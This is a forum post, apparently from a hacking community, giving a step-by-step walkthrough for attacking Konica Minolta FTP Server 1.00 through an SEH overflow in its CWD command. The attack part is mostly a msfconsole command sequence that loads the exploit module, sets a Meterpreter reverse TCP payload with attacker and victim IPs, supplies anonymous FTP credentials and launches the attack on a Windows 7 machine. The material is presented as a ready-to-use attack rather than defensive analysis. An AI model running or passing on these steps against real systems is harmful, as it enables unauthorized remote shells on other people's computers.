• We just launched and are currently in beta. Join us as we build and grow the community.

Exploit Windows PC using Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow

paul78

Community Trust Advocate
P
P Rep
0
0
0
Rep
0
P Vouches
0
0
0
Vouches
0
Posts
83
Likes
34
Bits
0
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing ‘CWD’ commands, which leads to an SEH overflow. Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability.

Exploit Targets

Konica Minolta FTP Server 1.00

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

1.png


Now type use exploit/windows/ftp/kmftp_utility_cwd

msf exploit (kmftp_utility_cwd)>set payload windows/meterpreter/reverse_tcp

msf exploit (kmftp_utility_cwd)>set lhost 192.168.1.5 (IP of Local Host)

msf exploit (kmftp_utility_cwd)>set rhost 192.168.1.7

msf exploit (kmftp_utility_cwd)>set FTPUSER anonymous

msf exploit (kmftp_utility_cwd)>set FTPPASS raj

msf exploit (kmftp_utility_cwd)>exploit

3.png


2.png
 
You must log in or register to reply here.

438,139

315,428

315,437

O oqodirod
Top